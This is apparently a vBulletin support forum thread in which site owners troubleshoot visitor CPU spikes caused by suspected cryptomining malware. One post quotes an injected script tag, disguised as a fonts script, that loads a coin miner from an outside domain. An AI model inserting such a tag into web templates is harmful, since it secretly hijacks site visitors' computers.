VB 4.2.3 infected by cryptomining malware

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • popup
    New Member
    • Sep 2012
    • 22

    VB 4.2.3 infected by cryptomining malware

    Hello,
    I've noticed that whenever I visit my VB 4.2.3 forum, I have high CPU load on my PC. The load drops as soon as I close the browser tab. So I guess some malware is running in the background.
    I have inactivated all plugins and ads but the problem persists.
    I tried to upgrade the forum to 4.2.5 but if failed to upgrade.

    Really appreciate your hints to troubleshoot/remove this problem.
  • Mark.B
    vBulletin Support
    • Feb 2004
    • 24287
    • 6.0.X

    #2
    That's rather a big assumption to make. You visit your forum, the CPU load goes up, so obviously it must be crypto mining software? What evidence do you have that this is the specific cause?

    Regardless of that, there are no known security exploits in 4.2.3, so if you HAVE been compromied, it's either through an add on, or the server, or someone's obtained a password.

    What are the results of a suspect file check under diagnostics in the AdminCP?

    "Failed to upgrade" also doesn't tell us anything. We need full details of what you did, and what error messages were received. However, upgrading isn't a magic fix for hacked sites so this isn't really essential at this point.
    MARK.B
    vBulletin Support
    ------------
    My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
    My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

    Comment

    • popup
      New Member
      • Sep 2012
      • 22

      #3
      I made that assumption lacking any other viable explanation, and regarding that some ads that I've used previously on the forum, had made the very same high cpu behavior on my other site (not forum).

      It seems that my VB version is 4.2.2 please modify the thread's titile.

      diagnostic gives a lot of :
      File version mismatch: found 4.2.2 Patch Level 6, expected 4.2.2 Patch Level 4
      Which is because I tried to update the forum with clean code, hoping that that will get rid of the malware. But it did not.


      Comment

      • Mark.B
        vBulletin Support
        • Feb 2004
        • 24287
        • 6.0.X

        #4
        Originally posted by popup
        I made that assumption lacking any other viable explanation, and regarding that some ads that I've used previously on the forum, had made the very same high cpu behavior on my other site (not forum).

        It seems that my VB version is 4.2.2 please modify the thread's titile.

        diagnostic gives a lot of :
        File version mismatch: found 4.2.2 Patch Level 6, expected 4.2.2 Patch Level 4
        Which is because I tried to update the forum with clean code, hoping that that will get rid of the malware. But it did not.

        Ok, the first thing I would do is upgrade to 4.2.3 (no higher at this stage).

        BEGIN BY TAKING A FULL BACKUP OF THE DATABASE.

        Download a full copy of the 4.2.3 files from the members area, under 'Download vBulletin....' under the license options column on the right. It's important to obtain the full 4.2.3 package, not the patch release, and make sure it's for the correct license.

        Unzip and upload ALL the files, then run domain.com/install/upgrade.php.
        MARK.B
        vBulletin Support
        ------------
        My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
        My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

        Comment

        • popup
          New Member
          • Sep 2012
          • 22

          #5
          I tried to upgrade to 4.2.3 but the upgrade freezed at %26.

          However at the the admincp now I see:

          (vBulletin 4.2.3 Patch Level 2)

          So not sure whether the upgrade was successful.

          At any rate, I still have that nasty high cpu load while the plugins are disabled.

          It happens only when I open the forum, not the admin panel.

          What do you suggest Mark as the next step?
          Last edited by popup; Sat 31 Mar '18, 11:20am.

          Comment

          • Mark.B
            vBulletin Support
            • Feb 2004
            • 24287
            • 6.0.X

            #6
            You need to complete the upgrade. If the page has stalled, refresh the page and it should carry on.
            MARK.B
            vBulletin Support
            ------------
            My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
            My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

            Comment

            • popup
              New Member
              • Sep 2012
              • 22

              #7
              I‌ managed to upgrade to 4.2.5 Beta 1 after a lot of refresh, while at several settings I‌ had to choose merge templates to 'No' in order to make it to proceed to upgrade. it is hanged at step 7 of 17 to reach 4.2.5 however.

              I still have that high cpu load. Where should I‌ look for the nefarious code/script?
              Last edited by popup; Sat 31 Mar '18, 6:07pm.

              Comment

              • Mark.B
                vBulletin Support
                • Feb 2004
                • 24287
                • 6.0.X

                #8
                I did say to upgrade to 4.2.3 and no higher at this stage. Why have you attempted to upgrade to 4.2.5?

                it is important to follow our instructions closely and precisely. If you don’t do this, we cannot help.

                If it is stuck at step 17 your upgrade is NOT complete and your site will be broken. No upgrade is complete until you get the completed message at the end.

                What php version are you running on the server?
                MARK.B
                vBulletin Support
                ------------
                My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
                My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

                Comment

                • popup
                  New Member
                  • Sep 2012
                  • 22

                  #9
                  I‌ have successfully upgraded to 4.2.3. But still get that high cpu load.
                  My php version is 5.6.30.
                  What can I‌do now?
                  Also, I'm wondering if it is not cryptomining malware, what else can cause such high cpu spike on a vBulletin site?‌
                  Last edited by popup; Sun 1 Apr '18, 3:45am.

                  Comment

                  • Trevor Hannant
                    vBulletin Support
                    • Aug 2002
                    • 24349
                    • 5.7.X

                    #10
                    Are you the only person who's having high PC CPU load when visiting your site or are other users experiencing this?
                    Vote for:

                    - Admin Settable Paid Subscription Reminder Timeframe (vB6)
                    - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)

                    Comment

                    • Jamsoft
                      Member
                      • Jun 2011
                      • 71

                      #11
                      I have the same thing happening on a customer's site. I've recommended they upgrade (or allow me to upgrade) to the latest 4.2.5 (they're on 4.2.0) and am awaiting their response. Their users are swearing up and down its the courier3.js file as well as the yui files. When I go to the site, my CPU starts spiking high, and if I sit in developer tools, I see tons of images keep being loaded every so often that are not showing up on the page. So something is up, but I havent yet seen something solid as far as whats causing it.

                      Comment

                      • Jamsoft
                        Member
                        • Jun 2011
                        • 71

                        #12
                        Ok, check this out:

                        <!-- Fonts Script -->
                        <!-- script async="async" src="http://allfontshere.press/fonts/courier3.js"></script -->
                        <!-- End Fonts Script -->
                        This script was loaded at the top of the customer's template. As first glance, it looked fine, but it was definitely causing the loads we were seeing. See if you have something similar.

                        Trevor, does the above look familiar at all?

                        Comment

                        • In Omnibus
                          Senior Member
                          • Apr 2010
                          • 2310

                          #13
                          Originally posted by Jamsoft
                          Ok, check this out:



                          This script was loaded at the top of the customer's template. As first glance, it looked fine, but it was definitely causing the loads we were seeing. See if you have something similar.

                          Trevor, does the above look familiar at all?
                          That is definitely a coin miner.

                          Comment

                          • Jamsoft
                            Member
                            • Jun 2011
                            • 71

                            #14
                            Nice. Well its disabled. It's not my site, so I'm not sure how it got there. I still think they should let me upgrade the site, and maybe add some security to the admincp.

                            Comment

                            • Dreslough
                              New Member
                              • Aug 2006
                              • 4
                              • 3.6.x

                              #15
                              We're running 4.2.4 and I just discovered the same problem. I even opened up my CPU, assuming I was dealing with a hardware problem after all the Windows diagnostics came back normal. Then I realized that I had a tab open to our company's forum (http://mogulforums.com/) in Chrome. And even after a reboot, Chrome was nice enough to re-open all my tabs. (D'oh!). Then I closed the vBulletin tab and my computer started working normally again (and the CPU usage dropped from 97-99% down to 2-3%).

                              I'm a vBulletin newbie so I'm still infected. But at least I'm partway to discovering and fixing. I have no plug-ins installed. Could someone please lead me through the steps to find and remove the offending code? (e.g. exactly what do I click on the Admin CP menu etc.)

                              For example, I don't even know how to search customer templates.

                              Thanks!

                              Clay

                              Comment

                              Related Topics

                              Collapse

                              Working...